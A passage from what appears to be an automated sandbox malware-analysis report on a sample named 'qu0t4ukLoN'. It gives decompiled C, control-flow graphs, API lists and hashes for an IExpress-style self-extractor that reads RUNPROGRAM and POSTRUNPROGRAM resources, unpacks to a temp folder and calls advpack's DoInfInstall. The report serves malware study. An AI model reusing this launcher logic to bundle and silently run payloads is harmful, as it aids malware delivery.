GetProcAddress 100->113 114 a93f92-a93fa9 call a944b9 100->114 108 a93f33-a93f3b 102->108 109 a93fd7-a93fd9 102->109 103->58 108->39 109->72 112->89 115 a93cea-a93ced 112->115 116 a93e3c-a93e80 113->116 117 a93f64-a93f76 call a944b9 FreeLibrary 113->117 126 a93f7c-a93f90 LocalFree call a96285 114->126 115->89 120 a93e8b-a93e94 116->120 121 a93e82-a93e87 116->121 117->126 124 a93e9f-a93ea2 120->124 125 a93e96-a93e9b 120->125 121->120 128 a93ead-a93eb6 124->128 129 a93ea4-a93ea9 124->129 125->124 126->58 131 a93eb8-a93ebd 128->131 132 a93ec1-a93ec3 128->132 129->128 131->132 133 a93ece-a93eec 132->133 134 a93ec5-a93eca 132->134 137 a93eee-a93ef3 133->137 138 a93ef5-a93efd 133->138 134->133 137->138 139 a93eff-a93f09 FreeLibrary 138->139 140 a93f40 FreeLibrary 138->140 139->102 140->103
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A93BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xa98004; // 0x6298f871
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xa99124 =  *0xa99124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xa98a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xa98c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00A9468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xa99124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00A91AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00A96CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00A93FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xa98580;
													if( *0xa98580 != 0) {
														E00A92267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xa98180;
											if( *0xa98180 == 0) {
												_t146 = 0x4c7;
												E00A944B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xa99124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xa99a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00A96495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00A944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xa99124 = E00A96285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00A944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xa98a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xa99a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xa98a38 & 0x0000ffff;
											_v380 = 0xa99154;
											_v376 = _t151;
											_v372 = 0xa991e4;
											_v360 = _t97;
											if( *0xa98a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xa99a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xa98d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xa99a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xa9a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xa99124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xa99a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xa98a20;
										if( *0xa98a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00A9202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00A9468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xa98c42;
									if( *0xa98c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xa98a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00A9468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00A9468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00A91781( &_v276, 0x104, _t130, 0xa98c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00A9468F(_t130, 0xa99a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                        0x00a93baa
                                                                                                                                                                                                        0x00a93bb0
                                                                                                                                                                                                        0x00a93bb7
                                                                                                                                                                                                        0x00a93bc0
                                                                                                                                                                                                        0x00a93bc2
                                                                                                                                                                                                        0x00a93bc9
                                                                                                                                                                                                        0x00a93bcb
                                                                                                                                                                                                        0x00a93bcf
                                                                                                                                                                                                        0x00a93bd3
                                                                                                                                                                                                        0x00a93bd9
                                                                                                                                                                                                        0x00a93bfd
                                                                                                                                                                                                        0x00a93bfd
                                                                                                                                                                                                        0x00a93bff
                                                                                                                                                                                                        0x00a93c03
                                                                                                                                                                                                        0x00a93c03
                                                                                                                                                                                                        0x00a93c11
                                                                                                                                                                                                        0x00a93c16
                                                                                                                                                                                                        0x00a93c19
                                                                                                                                                                                                        0x00a93c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c30
                                                                                                                                                                                                        0x00a93c39
                                                                                                                                                                                                        0x00a93c40
                                                                                                                                                                                                        0x00a93d13
                                                                                                                                                                                                        0x00a93d15
                                                                                                                                                                                                        0x00a93d21
                                                                                                                                                                                                        0x00a93d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c4f
                                                                                                                                                                                                        0x00a93c56
                                                                                                                                                                                                        0x00a93c60
                                                                                                                                                                                                        0x00a93c65
                                                                                                                                                                                                        0x00a93c77
                                                                                                                                                                                                        0x00a93c78
                                                                                                                                                                                                        0x00a93c7c
                                                                                                                                                                                                        0x00a93c7e
                                                                                                                                                                                                        0x00a93c82
                                                                                                                                                                                                        0x00a93c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c7c
                                                                                                                                                                                                        0x00a93c67
                                                                                                                                                                                                        0x00a93c69
                                                                                                                                                                                                        0x00a93c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c58
                                                                                                                                                                                                        0x00a93c58
                                                                                                                                                                                                        0x00a93c6e
                                                                                                                                                                                                        0x00a93c6e
                                                                                                                                                                                                        0x00a93c87
                                                                                                                                                                                                        0x00a93c89
                                                                                                                                                                                                        0x00a93d4d
                                                                                                                                                                                                        0x00a93d4f
                                                                                                                                                                                                        0x00a93d50
                                                                                                                                                                                                        0x00a93d52
                                                                                                                                                                                                        0x00a93d9e
                                                                                                                                                                                                        0x00a93da8
                                                                                                                                                                                                        0x00a93daf
                                                                                                                                                                                                        0x00a93db4
                                                                                                                                                                                                        0x00a93db6
                                                                                                                                                                                                        0x00a93f4d
                                                                                                                                                                                                        0x00a93f4d
                                                                                                                                                                                                        0x00a93f4f
                                                                                                                                                                                                        0x00a93f56
                                                                                                                                                                                                        0x00a93f57
                                                                                                                                                                                                        0x00a93f58
                                                                                                                                                                                                        0x00a93f63
                                                                                                                                                                                                        0x00a93f63
                                                                                                                                                                                                        0x00a93dbc
                                                                                                                                                                                                        0x00a93dc0
                                                                                                                                                                                                        0x00a93dc2
                                                                                                                                                                                                        0x00a93de6
                                                                                                                                                                                                        0x00a93de6
                                                                                                                                                                                                        0x00a93de8
                                                                                                                                                                                                        0x00a93f0b
                                                                                                                                                                                                        0x00a93f0b
                                                                                                                                                                                                        0x00a93f0f
                                                                                                                                                                                                        0x00a93f13
                                                                                                                                                                                                        0x00a93f15
                                                                                                                                                                                                        0x00a93f1a
                                                                                                                                                                                                        0x00a93f1c
                                                                                                                                                                                                        0x00a93f46
                                                                                                                                                                                                        0x00a93f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f47
                                                                                                                                                                                                        0x00a93f1e
                                                                                                                                                                                                        0x00a93f1f
                                                                                                                                                                                                        0x00a93f25
                                                                                                                                                                                                        0x00a93f26
                                                                                                                                                                                                        0x00a93f2a
                                                                                                                                                                                                        0x00a93f2d
                                                                                                                                                                                                        0x00a93fd9
                                                                                                                                                                                                        0x00a93fd9
                                                                                                                                                                                                        0x00a93fda
                                                                                                                                                                                                        0x00a93fda
                                                                                                                                                                                                        0x00a93fe1
                                                                                                                                                                                                        0x00a93fe3
                                                                                                                                                                                                        0x00a93fe3
                                                                                                                                                                                                        0x00a93fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93fe8
                                                                                                                                                                                                        0x00a93f33
                                                                                                                                                                                                        0x00a93f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f37
                                                                                                                                                                                                        0x00a93dee
                                                                                                                                                                                                        0x00a93dee
                                                                                                                                                                                                        0x00a93df5
                                                                                                                                                                                                        0x00a93fad
                                                                                                                                                                                                        0x00a93fb9
                                                                                                                                                                                                        0x00a93fc2
                                                                                                                                                                                                        0x00a93fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93fc8
                                                                                                                                                                                                        0x00a93dfb
                                                                                                                                                                                                        0x00a93dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93e03
                                                                                                                                                                                                        0x00a93e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93e15
                                                                                                                                                                                                        0x00a93e17
                                                                                                                                                                                                        0x00a93e19
                                                                                                                                                                                                        0x00a93f94
                                                                                                                                                                                                        0x00a93fa4
                                                                                                                                                                                                        0x00a93f7c
                                                                                                                                                                                                        0x00a93f80
                                                                                                                                                                                                        0x00a93f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f8b
                                                                                                                                                                                                        0x00a93e2c
                                                                                                                                                                                                        0x00a93e30
                                                                                                                                                                                                        0x00a93e34
                                                                                                                                                                                                        0x00a93e36
                                                                                                                                                                                                        0x00a93f69
                                                                                                                                                                                                        0x00a93f6e
                                                                                                                                                                                                        0x00a93f70
                                                                                                                                                                                                        0x00a93f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f76
                                                                                                                                                                                                        0x00a93e3c
                                                                                                                                                                                                        0x00a93e43
                                                                                                                                                                                                        0x00a93e47
                                                                                                                                                                                                        0x00a93e52
                                                                                                                                                                                                        0x00a93e56
                                                                                                                                                                                                        0x00a93e5c
                                                                                                                                                                                                        0x00a93e61
                                                                                                                                                                                                        0x00a93e68
                                                                                                                                                                                                        0x00a93e70
                                                                                                                                                                                                        0x00a93e74
                                                                                                                                                                                                        0x00a93e7c
                                                                                                                                                                                                        0x00a93e80
                                                                                                                                                                                                        0x00a93e82
                                                                                                                                                                                                        0x00a93e82
                                                                                                                                                                                                        0x00a93e87
                                                                                                                                                                                                        0x00a93e87
                                                                                                                                                                                                        0x00a93e8b
                                                                                                                                                                                                        0x00a93e91
                                                                                                                                                                                                        0x00a93e94
                                                                                                                                                                                                        0x00a93e96
                                                                                                                                                                                                        0x00a93e96
                                                                                                                                                                                                        0x00a93e9b
                                                                                                                                                                                                        0x00a93e9b
                                                                                                                                                                                                        0x00a93e9f
                                                                                                                                                                                                        0x00a93ea2
                                                                                                                                                                                                        0x00a93ea4
                                                                                                                                                                                                        0x00a93ea4
                                                                                                                                                                                                        0x00a93ea9
                                                                                                                                                                                                        0x00a93ea9
                                                                                                                                                                                                        0x00a93ead
                                                                                                                                                                                                        0x00a93eb3
                                                                                                                                                                                                        0x00a93eb6
                                                                                                                                                                                                        0x00a93eb8
                                                                                                                                                                                                        0x00a93eb8
                                                                                                                                                                                                        0x00a93ebd
                                                                                                                                                                                                        0x00a93ebd
                                                                                                                                                                                                        0x00a93ec1
                                                                                                                                                                                                        0x00a93ec3
                                                                                                                                                                                                        0x00a93ec5
                                                                                                                                                                                                        0x00a93ec5
                                                                                                                                                                                                        0x00a93eca
                                                                                                                                                                                                        0x00a93eca
                                                                                                                                                                                                        0x00a93ece
                                                                                                                                                                                                        0x00a93ed5
                                                                                                                                                                                                        0x00a93ed9
                                                                                                                                                                                                        0x00a93ee0
                                                                                                                                                                                                        0x00a93ee6
                                                                                                                                                                                                        0x00a93eea
                                                                                                                                                                                                        0x00a93eec
                                                                                                                                                                                                        0x00a93eee
                                                                                                                                                                                                        0x00a93ef3
                                                                                                                                                                                                        0x00a93ef3
                                                                                                                                                                                                        0x00a93ef5
                                                                                                                                                                                                        0x00a93efa
                                                                                                                                                                                                        0x00a93efb
                                                                                                                                                                                                        0x00a93efd
                                                                                                                                                                                                        0x00a93f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93eff
                                                                                                                                                                                                        0x00a93eff
                                                                                                                                                                                                        0x00a93f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f05
                                                                                                                                                                                                        0x00a93efd
                                                                                                                                                                                                        0x00a93dc7
                                                                                                                                                                                                        0x00a93dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93dd0
                                                                                                                                                                                                        0x00a93dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93dd9
                                                                                                                                                                                                        0x00a93ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ddd
                                                                                                                                                                                                        0x00a93de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93de1
                                                                                                                                                                                                        0x00a93d59
                                                                                                                                                                                                        0x00a93d65
                                                                                                                                                                                                        0x00a93d6a
                                                                                                                                                                                                        0x00a93d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d6e
                                                                                                                                                                                                        0x00a93d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d8f
                                                                                                                                                                                                        0x00a93d96
                                                                                                                                                                                                        0x00a93d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d98
                                                                                                                                                                                                        0x00a93c8f
                                                                                                                                                                                                        0x00a93c98
                                                                                                                                                                                                        0x00a93cf1
                                                                                                                                                                                                        0x00a93cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93cfe
                                                                                                                                                                                                        0x00a93d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d11
                                                                                                                                                                                                        0x00a93c9c
                                                                                                                                                                                                        0x00a93ca5
                                                                                                                                                                                                        0x00a93ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93cad
                                                                                                                                                                                                        0x00a93cb2
                                                                                                                                                                                                        0x00a93cb7
                                                                                                                                                                                                        0x00a93cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ce8
                                                                                                                                                                                                        0x00a93cec
                                                                                                                                                                                                        0x00a93ced
                                                                                                                                                                                                        0x00a93ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ce8
                                                                                                                                                                                                        0x00a93c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c9e
                                                                                                                                                                                                        0x00a93c56
                                                                                                                                                                                                        0x00a93d35
                                                                                                                                                                                                        0x00a93d35
                                                                                                                                                                                                        0x00a93d3c
                                                                                                                                                                                                        0x00a93d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d48
                                                                                                                                                                                                        0x00a93c03
                                                                                                                                                                                                        0x00a93be2
                                                                                                                                                                                                        0x00a93be7
                                                                                                                                                                                                        0x00a93bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A93C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A93CDC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A98C42), ref: 00A93D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A93E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A98C42), ref: 00A93F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-3627123777
                                                                                                                                                                                                        • Opcode ID: f9ebc8c29cb3ce74ffb8c2c6320681afc5c364c2f4ad63f0601ff85e6f0b3ac7
                                                                                                                                                                                                        • Instruction ID: 329ec58fd67d68a3b081f72a266c866de9e183536ea3b6be266e8ce3fe89edf3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9ebc8c29cb3ce74ffb8c2c6320681afc5c364c2f4ad63f0601ff85e6f0b3ac7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B1F472708301ABDF20DF688949B6B77F4EB89740F10092EFA95DA190DB74CD46CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A91AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 a91ae8-a91b2c call a91680 144 a91b3b-a91b40 141->144 145 a91b2e-a91b39 141->145 146 a91b46-a91b61 call a91a84 144->146 145->146 149 a91b9f-a91bc2 call a91781 call a9658a 146->149 150 a91b63-a91b65 146->150 159 a91bc7-a91bd3 call a966c8 149->159 151 a91b68-a91b6d 150->151 151->151 153 a91b6f-a91b74 151->153 153->149 155 a91b76-a91b7b 153->155 157 a91b7d-a91b81 155->157 158 a91b83-a91b86 155->158 157->158 161 a91b8c-a91b9d call a91680 157->161 158->149 162 a91b88-a91b8a 158->162 165 a91bd9-a91bf1 CompareStringA 159->165 166 a91d73-a91d7f call a966c8 159->166 161->159 162->149 162->161 165->166 168 a91bf7-a91c07 GetFileAttributesA 165->168 175 a91df8-a91e09 LocalAlloc 166->175 176 a91d81-a91d99 CompareStringA 166->176 170 a91c0d-a91c15 168->170 171 a91d53-a91d5e 168->171 170->171 174 a91c1b-a91c33 call a91a84 170->174 173 a91d64-a91d6e call a944b9 171->173 187 a91e94-a91ea4 call a96ce0 173->187 189 a91c50-a91c61 LocalAlloc 174->189 190 a91c35-a91c38 174->190 178 a91e0b-a91e1b GetFileAttributesA 175->178 179 a91dd4-a91ddf 175->179 176->175 181 a91d9b-a91da2 176->181 183 a91e1d-a91e1f 178->183 184 a91e67-a91e73 call a91680 178->184 179->173 186 a91da5-a91daa 181->186 183->184 188 a91e21-a91e3e call a91781 183->188 199 a91e78-a91e84 call a92aac 184->199 186->186 191 a91dac-a91db4 186->191 188->199 210 a91e40-a91e43 188->210 189->179 198 a91c67-a91c72 189->198 195 a91c3a 190->195 196 a91c40-a91c4b call a91a84 190->196 197 a91db7-a91dbc 191->197 195->196 196->189 197->197 203 a91dbe-a91dd2 LocalAlloc 197->203 204 a91c79-a91cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 a91c74 198->205 209 a91e89-a91e92 199->209 203->179 211 a91de1-a91df3 call a9171e 203->211 207 a91cf8-a91d07 204->207 208 a91cc2-a91ccc 204->208 205->204 215 a91d09-a91d21 GetShortPathNameA 207->215 216 a91d23 207->216 212 a91cce 208->212 213 a91cd3-a91cf3 call a91680 * 2 208->213 209->187 210->199 214 a91e45-a91e65 call a916b3 * 2 210->214 211->209 212->213 213->209 214->199 220 a91d28-a91d2b 215->220 216->220 224 a91d2d 220->224 225 a91d32-a91d4e call a9171e 220->225 224->225 225->209
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A91AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xa98004; // 0x6298f871
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00A91680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00A91A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00A91781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E00A9658A( &_v268, 0x104, _t156);
					goto L13;
